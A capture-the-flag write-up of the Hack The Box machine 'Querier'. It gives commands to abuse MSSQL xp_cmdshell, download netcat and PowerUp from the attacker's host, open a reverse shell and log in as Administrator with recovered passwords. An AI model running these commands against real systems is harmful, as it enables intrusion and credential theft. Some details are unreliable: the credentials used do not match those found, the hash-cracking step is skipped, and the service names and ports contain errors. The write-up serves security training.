Summary
- OS — Windows
- Difficulty — Medium
- Released — February 16, 2019
- Creator — mrh4sh & egre55
Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.
Foothold
I'll start off by running Nmap using the default NSE scripts with the -sC flag, and enumerating service versions with the -sV flag, and outputting the results to a file called 'scan.nmap' with the -o flag:
sudo nmap -sC -sV -o scan.nmap 10.10.10.125
First, I'll check if the RCP or SMB server allows for null authentication:
rpcclient --user='' --no-pass 10.10.10.125I'm able to get a null authentication RPC shell, but all of the useful commands are disabled, so I'll pivot over to SMB:
smbclient -L //10.10.10.125 -N -m SMB2
The only non-default share is 'Reports' which I'll connect to and list the files present:
smbclient //10.10.10.125/Reports -N -m SMB2
dir
Interestingly, there's a netcat binary present, but the Excel macro-enabled spreadsheet interests me the most. I'll download this file to my local host, then transfer it over to a Windows host with Microsoft Office installed to view it:
mget "Currency Volume Report.xlsm"With the spreadsheet opened, I'll click the 'Developer' tab, then select 'Visual Basic':
The macro is connecting to a remote Microsoft MySQL Server (which I saw running on port 1433 from my Nmap scan) to pull data down into the spreadsheet. The connection portion of the macro exposes a plaintext username and password of 'reporting:PcwTWTHRwryjc$c6'.
I'll use these credentials to connect to the MSSQL Server remotely using Impacket's mssqlclient module:
impacket-mssqlclient QUERIER/'mssql-svc:corporate568'@10.10.10.125 -windows-auth
Once authenticated, I'll enable xp_cmdshell which will allow me to execute OS commands directly from the MSSQL Server shell. Then, I'll use it to download nc64.exe to the box, which I'll use to execute a reverse shell:
enable_xp_cmdshell
RECONFIGUREI'll host the netcat binary locally:
python3 -m http.server 80Then, I'll download nc64.exe to the box, set up a listener, then execute the netcat reverse shell:
xp_cmdshell powershell curl 10.10.15.254/nc64.exe -outfile C:\\programdata\\nc64.exe
rlwrap nc -lvnp 9001
xp_cmdshell C:\\programdata\\nc64.exe -e powershell.exe 10.10.15.254 9001
As shown above, I now have a shell on the box as the mssql-svc user.
Privilege Escalation — Adminsitrator
First, I'll download and run PowerUp.ps1 on the box to see if it can identify any privilege escalation paths for me:
python3 -m http.server 80
curl 10.10.15.254/PowerUp.ps1 -outfile PowerUp.ps1
Next, I need to install the PowerUp.ps1 modules, then I can run the Invoke-AllChecks cmdlet:
. .\PowerUp.ps1
Invoke-AllChecks
PowerUp.ps1 finds a plaintext password of 'MyUnclesAreMarioAndLuigi!!1!' in an old Group Policy XML file for the Administrator user.
Now, I can simply use Evil-WinRM (since I noticed port 5958 was open on my Nmap scan) to authenticate directly into the box as the Administrator user:
evil-winrm -i 10.10.10.125 -u Administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
As shown above, I now have a shell as the Administrator user on the box.